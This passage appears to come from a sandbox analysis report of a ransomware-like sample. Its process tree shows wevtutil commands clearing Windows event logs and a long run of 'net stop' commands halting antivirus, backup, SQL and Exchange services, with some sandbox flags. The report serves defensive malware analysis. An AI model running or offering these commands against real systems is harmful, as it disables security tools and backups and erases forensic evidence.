wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
4⤵
PID:5040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
4⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
4⤵
- Clears Windows event logs
PID:4904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
4⤵
PID:3240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
4⤵
PID:4892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
4⤵
PID:1184

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
4⤵
PID:3664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "mfemms"
3⤵
PID:3708

C:\Windows\system32\net.exe
net stop "mfemms"
4⤵
PID:3484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "mfemms"
5⤵
PID:5072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "mfevtp"
3⤵
PID:2696

C:\Windows\system32\net.exe
net stop "mfevtp"
4⤵
PID:4384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "mfevtp"
5⤵
PID:4404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MMS"
3⤵
PID:3836

C:\Windows\system32\net.exe
net stop "MMS"
4⤵
PID:1372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MMS"
5⤵
PID:4552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
3⤵
PID:2360

C:\Windows\system32\net.exe
net stop "mozyprobackup"
4⤵
PID:1360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "mozyprobackup"
5⤵
PID:2684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
3⤵
PID:2384

C:\Windows\system32\net.exe
net stop "MsDtsServer"
4⤵
PID:1252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MsDtsServer"
5⤵
PID:3520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
3⤵
PID:4652

C:\Windows\system32\net.exe
net stop "MsDtsServer100"
4⤵
PID:2412

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MsDtsServer100"
5⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
3⤵
PID:4568

C:\Windows\system32\net.exe
net stop "MsDtsServer110"
4⤵
PID:1216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MsDtsServer110"
5⤵
PID:3060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
3⤵
PID:692

C:\Windows\system32\net.exe
net stop "MSExchangeES"
4⤵
PID:4588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeES"
5⤵
PID:4200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
3⤵
PID:4268

C:\Windows\system32\net.exe
net stop "MSExchangeIS"
4⤵
PID:1592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeIS"
5⤵
PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
3⤵
PID:1272

C:\Windows\system32\net.exe
net stop "MSExchangeMGMT"
4⤵
PID:4636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeMGMT"
5⤵
PID:1964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
3⤵
PID:904

C:\Windows\system32\net.exe
net stop "MSExchangeMTA"
4⤵
PID:2776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeMTA"
5⤵
PID:4832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
3⤵
PID:416

C:\Windows\system32\net.exe
net stop "MSExchangeSA"
4⤵
PID:4492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeSA"
5⤵
PID:5084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
3⤵
PID:4760

C:\Windows\system32\net.exe
net stop "MSExchangeSRS"
4⤵
PID:5080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSExchangeSRS"
5⤵
PID:3720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
3⤵
PID:4176

C:\Windows\system32\net.exe
net stop "MSOLAP$SQL_2008"
4⤵
PID:1072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
5⤵
PID:972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
3⤵
PID:5040

C:\Windows\system32\net.exe
net stop "MSOLAP$SYSTEM_BGC"
4⤵
PID:4160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
5⤵
PID:4488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
3⤵
PID:4512

C:\Windows\system32\net.exe
net stop "MSOLAP$TPS"
4⤵
PID:2452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSOLAP$TPS"
5⤵
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
3⤵
PID:5000

C:\Windows\system32\net.exe
net stop "MSOLAP$TPSAMA"
4⤵
PID:3968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
5⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
3⤵
PID:2864

C:\Windows\system32\net.exe
net stop "MSSQL$BKUPEXEC"
4⤵
PID:4956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
5⤵
PID:4788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
3⤵
PID:5100

C:\Windows\system32\net.exe
net stop "MSSQL$ECWDB2"
4⤵
PID:3616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
5⤵
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
3⤵
PID:1736

C:\Windows\system32\net.exe
net stop "MSSQL$PRACTICEMGT"
4⤵
PID:3032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
5⤵
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
3⤵
PID:2604

C:\Windows\system32\net.exe
net stop "MSSQL$PRACTTICEBGC"
4⤵
PID:1356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
5⤵
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
3⤵
PID:2100

C:\Windows\system32\net.exe
net stop "MSSQL$PROFXENGAGEMENT"
4⤵
PID:2768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
5⤵
PID:276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
3⤵
PID:4244

C:\Windows\system32\net.exe
net stop "MSSQL$SBSMONITORING"
4⤵
PID:4128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
5⤵
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
3⤵
PID:4216

C:\Windows\system32\net.exe
net stop "MSSQL$SHAREPOINT"
4⤵
PID:4912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
5⤵
PID:4936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
3⤵
PID:2236

C:\Windows\system32\net.exe
net stop "MSSQL$SQL_2008"
4⤵
PID:1920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
5⤵
PID:3136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
3⤵
PID:4276

C:\Windows\system32\net.exe
net stop "MSSQL$SYSTEM_BGC"
4⤵
PID:1684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
5⤵
PID:2324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
3⤵
PID:1472

C:\Windows\system32\net.exe
net stop "MSSQL$TPS"
4⤵
PID:4960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$TPS"
5⤵
PID:4388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
3⤵
PID:636

C:\Windows\system32\net.exe
net stop "MSSQL$TPSAMA"
4⤵
PID:4296

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
5⤵
PID:2292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
3⤵
PID:4468

C:\Windows\system32\net.exe
net stop "MSSQL$VEEAMSQL2008R2"
4⤵
PID:4992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
5⤵
PID:4152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
3⤵
PID:4188

C:\Windows\system32\net.exe
net stop "MSSQL$VEEAMSQL2012"
4⤵
PID:2612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
5⤵
PID:340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
3⤵
PID:888

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher"
4⤵
PID:3676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher"
5⤵
PID:4980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
3⤵
PID:976

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
4⤵
PID:660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
5⤵
PID:3684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
3⤵
PID:4400

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$SBSMONITORING"
4⤵
PID:4384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
5⤵
PID:2696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
3⤵
PID:4552

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$SHAREPOINT"
4⤵
PID:1740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
5⤵
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
3⤵
PID:2684

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$SQL_2008"
4⤵
PID:1928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
5⤵
PID:1520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
3⤵
PID:3048

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$SYSTEM_BGC"
4⤵
PID:3956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
5⤵
PID:1148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
3⤵
PID:4312

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$TPS"
4⤵
PID:4228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
5⤵
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
3⤵
PID:4572

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher$TPSAMA"
4⤵
PID:2568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
5⤵
PID:3500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
3⤵
PID:4192

C:\Windows\system32\net.exe
net stop "MSSQLSERVER"
4⤵
PID:4204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLSERVER"
5⤵
PID:4284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
3⤵
PID:4584

C:\Windows\system32\net.exe
net stop "MSSQLServerADHelper100"
4⤵
PID:1216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
5⤵
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
3⤵
PID:896

C:\Windows\system32\net.exe
net stop "MSSQLServerOLAPService"
4⤵
PID:5068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
5⤵
PID:1132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MySQL80"
3⤵
PID:4540

C:\Windows\system32\net.exe
net stop "MySQL80"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MySQL80"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MySQL57"
3⤵
PID:2952

C:\Windows\system32\net.exe
net stop "MySQL57"
4⤵
PID:1592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MySQL57"
5⤵
PID:4268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
3⤵
PID:3932

C:\Windows\system32\net.exe
net stop "OracleClientCache80"
4⤵
PID:4636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "OracleClientCache80"
5⤵
PID:1272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
3⤵
PID:4804

C:\Windows\system32\net.exe
net stop "PDVFSService"
4⤵
PID:2776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "PDVFSService"
5⤵
PID:904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
3⤵
PID:4000

C:\Windows\system32\net.exe
net stop "POP3Svc"
4⤵
PID:4492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "POP3Svc"
5⤵
PID:416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer"
3⤵
PID:5020

C:\Windows\system32\net.exe
net stop "ReportServer"
4⤵
PID:972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer"
5⤵
PID:1072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
3⤵
PID:596

C:\Windows\system32\net.exe
net stop "ReportServer$SQL_2008"
4⤵
PID:4488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
5⤵
PID:4160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
3⤵
PID:4800

C:\Windows\system32\net.exe
net stop "ReportServer$SYSTEM_BGC"
4⤵
PID:4460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
5⤵
PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
3⤵
PID:4828

C:\Windows\system32\net.exe
net stop "ReportServer$TPS"
4⤵
PID:4844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer$TPS"
5⤵
PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
3⤵
PID:2024

C:\Windows\system32\net.exe
net stop "ReportServer$TPSAMA"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
5⤵
PID:4764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "RESvc"
3⤵
PID:4772

C:\Windows\system32\net.exe
net stop "RESvc"
4⤵
PID:4940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "RESvc"
5⤵
PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "sacsvr"
3⤵
PID:4840

C:\Windows\system32\net.exe
net stop "sacsvr"
4⤵
PID:700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "sacsvr"
5⤵
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SamSs"
3⤵
PID:1380

C:\Windows\system32\net.exe
net stop "SamSs"
4⤵
PID:5100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs"
5⤵
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
3⤵
PID:3664

C:\Windows\system32\net.exe
net stop "SAVAdminService"
4⤵
PID:388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVAdminService"
5⤵
PID:4892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SAVService"
3⤵
PID:4908

C:\Windows\system32\net.exe
net stop "SAVService"
4⤵
PID:1224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVService"
5⤵
PID:3344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Smcinst"
3⤵
PID:252

C:\Windows\system32\net.exe
net stop "Smcinst"
4⤵
PID:3496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Smcinst"
5⤵
PID:276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SmcService"
3⤵
PID:2020

C:\Windows\system32\net.exe
net stop "SmcService"
4⤵
PID:4876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SmcService"
5⤵
PID:4920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
3⤵
PID:3724

C:\Windows\system32\net.exe
net stop "SMTPSvc"
4⤵
PID:4936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SMTPSvc"
5⤵
PID:4912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SNAC"
3⤵
PID:412

C:\Windows\system32\net.exe
net stop "SNAC"
4⤵
PID:3136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SNAC"
5⤵
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SntpService"
3⤵
PID:3228

C:\Windows\system32\net.exe
net stop "SntpService"
4⤵
PID:1340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SntpService"
5⤵
PID:1152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "sophossps"
3⤵
PID:4116

C:\Windows\system32\net.exe
net stop "sophossps"
4⤵
PID:4388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "sophossps"
5⤵
PID:3440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
3⤵
PID:1472

C:\Windows\system32\net.exe
net stop "SQLAgent$BKUPEXEC"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
5⤵
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
3⤵
PID:3040

C:\Windows\system32\net.exe
net stop "SQLAgent$ECWDB2"
4⤵
PID:4480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
5⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
3⤵
PID:4992

C:\Windows\system32\net.exe
net stop "SQLAgent$PRACTTICEBGC"
4⤵
PID:4468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
5⤵
PID:2964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
3⤵
PID:4052

C:\Windows\system32\net.exe
net stop "SQLAgent$PRACTTICEMGT"
4⤵
PID:3768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
5⤵
PID:2612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
3⤵
PID:2908

C:\Windows\system32\net.exe
net stop "SQLAgent$PROFXENGAGEMENT"
4⤵
PID:3484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
5⤵
PID:3760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
3⤵
PID:1796

C:\Windows\system32\net.exe
net stop "SQLAgent$SBSMONITORING"
4⤵
PID:4404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
5⤵
PID:3684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
3⤵
PID:4524

C:\Windows\system32\net.exe
net stop "SQLAgent$SHAREPOINT"
4⤵
PID:1264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
5⤵
PID:2696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
3⤵
PID:2392

C:\Windows\system32\net.exe
net stop "SQLAgent$SQL_2008"
4⤵
PID:3816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
5⤵
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
3⤵
PID:3000

C:\Windows\system32\net.exe
net stop "SQLAgent$SYSTEM_BGC"
4⤵
PID:2096

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
5⤵
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
3⤵
PID:1528

C:\Windows\system32\net.exe
net stop "SQLAgent$TPS"
4⤵
PID:4340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$TPS"
5⤵
PID:1148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
3⤵
PID:4308

C:\Windows\system32\net.exe
net stop "SQLAgent$TPSAMA"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
5⤵
PID:4536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
3⤵
PID:4628

C:\Windows\system32\net.exe
net stop "SQLAgent$VEEAMSQL2008R2"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
5⤵
PID:3500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
3⤵
PID:1688

C:\Windows\system32\net.exe
net stop "SQLAgent$VEEAMSQL2012"
4⤵
PID:3060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
5⤵
PID:4284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
3⤵
PID:4196

C:\Windows\system32\net.exe
net stop "SQLBrowser"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLBrowser"
5⤵
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
3⤵
PID:4200

C:\Windows\system32\net.exe
net stop "SQLSafeOLRService"
4⤵
PID:5068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLSafeOLRService"
5⤵
PID:896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
3⤵
PID:4432

C:\Windows\system32\net.exe
net stop "SQLSERVERAGENT"
4⤵
PID:1964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLSERVERAGENT"
5⤵
PID:4268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
3⤵
PID:1388

C:\Windows\system32\net.exe
net stop "SQLTELEMETRY"
4⤵
PID:4832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLTELEMETRY"
5⤵
PID:1272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
3⤵
PID:1028

C:\Windows\system32\net.exe
net stop "SQLTELEMETRY$ECWDB2"
4⤵
PID:3648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
5⤵
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
3⤵
PID:4804

C:\Windows\system32\net.exe
net stop "SQLWriter"
4⤵
PID:4756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLWriter"
5⤵
- Drops startup file
PID:488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
3⤵
PID:4500

C:\Windows\system32\net.exe
net stop "SstpSvc"
4⤵
PID:1220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc"
5⤵
PID:1268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
3⤵
PID:344

C:\Windows\system32\net.exe
net stop "svcGenericHost"
4⤵
PID:4132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "svcGenericHost"
5⤵
PID:4160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "tmlisten"
3⤵
PID:5004

C:\Windows\system32\net.exe
net stop "tmlisten"
4⤵
PID:5016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "tmlisten"
5⤵
PID:940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "TrueKey"
3⤵
PID:2080

C:\Windows\system32\net.exe
net stop "TrueKey"
4⤵
PID:4824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "TrueKey"
5⤵
PID:5012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
3⤵
PID:4944

C:\Windows\system32\net.exe
net stop "UI0Detect"
4⤵
PID:4788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect"
5⤵
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
3⤵
PID:1980

C:\Windows\system32\net.exe
net stop "VeeamBackupSvc"
4⤵
PID:3480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamBackupSvc"
5⤵
PID:4780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
3⤵
PID:4808

C:\Windows\system32\net.exe
net stop "VeeamBrokerSvc"
4⤵
PID:3616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamBrokerSvc"
5⤵
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
3⤵
PID:5096

C:\Windows\system32\net.exe
net stop "VeeamCatalogSvc"
4⤵
PID:1104

C:\Windows\system32\net1.exe
